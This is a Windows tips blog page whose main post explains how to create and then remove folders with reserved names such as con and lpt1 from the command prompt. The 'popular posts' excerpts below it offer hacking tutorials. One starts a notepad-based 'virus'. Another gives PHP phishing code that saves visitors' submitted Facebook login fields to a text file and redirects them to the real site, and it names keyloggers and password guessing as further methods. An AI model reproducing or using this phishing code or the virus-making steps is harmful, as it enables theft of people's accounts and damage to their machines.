Skip to main content

Create Undeletable And UnRenameable Folders Without Any Software

Create A Undeletable And Unrenamable Folders In Windows 


 
In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.





Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

How To Create Undeletable And Unrenamable Folders ?

Step 1:- Go to Start and then Click on Run.

Step 2:- Type cmd & hit enter (To open Command Prompt ).

Step 3:- Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:

Step 4:- Type D: or E: and hit enter.

Step 5:- Type md con\ and hit enter (md - make directory).

Step 6:- You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.

Step 7:- Open that directory, you will see the folder created of name con.

Step 8:- Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.


Step 1:- Open Command Prompt.

Step 2:- Type D: ( if u created this type of folder in D: drive) & hit enter.

Step 3:- Type rd con\ (rd - remove directory).

Step 4:- Open that directory and the folder will not appear because it is removed.

Comments

Popular posts from this blog

How to hack anyone System in seconds and Create viruses

G et some knowledge about virus... What is Virus ?  A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems   Create Virus on Notepad : It is very easy to create a virus on notepad   H ow to open notepad follow these steps 1. P ush win + R then new window will open then type notepad and click on OK . After that notepad will open then type or paste these command and make a virus.   1 -> Virus Creation Tricks 1 Just open the Notepad and type the paste the following Code. set ws=createobje...

How to hack anyone facebook account with easiest way.

Hack Facebook Account with Easiest Way. T oday I am going to discuss some methods that can be used to hack a Facebook account password   Today I will cover only way to Hack Facebook Account Password that all hackers usually use to hack your Facebook account . 1 . F acebook P hishing Attack(Today's topic) . 2 . Hacking Facebook account password remotely using K eyloggers. 3 . S ocial Engineering or simply Guessing your friends Password.                                Facebook Phishing You need these three Files : 1.phishing.php 2.password.txt 3.facebook.html 1. Phishing.php File :-   **   Open Notepad and paste the Following code in notepad. header ('Location: https://www.facebook.com/login.php?login_attempt=1 '); $handle = fopen("password.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, ...

Check Your Mother Board Model Number ,Serial Number, Version, And Many More.

How to Check Your Motherboard Model Number on Your Windows PC Whether you need to update drivers, want to check hardware compatibility, or you’re just curious , it’s way easier to check your motherboard model number with these simple tricks than it is to crack open your computer case to check the board itself . Read on as we show you how to check your motherboard model number from the comfort of your keyboard. Why Do I Want To Do This? There are a variety of situations where knowing your motherboard’s model number is important: upgrading your drivers, buying new hardware (you’ll need the proper expansion slots for card-based upgrades and the right memory DIMMS for memory upgrades, etc.), and checking the capabilities of your board if you’re considering upgrading the entire thing.  First Way (SIMPLEST WAY):- In this way there is only two step :- Step 1:- Go to Run(By Pressing Win+R) . Step 2:- Type dxdiag in Run and hit enter . ...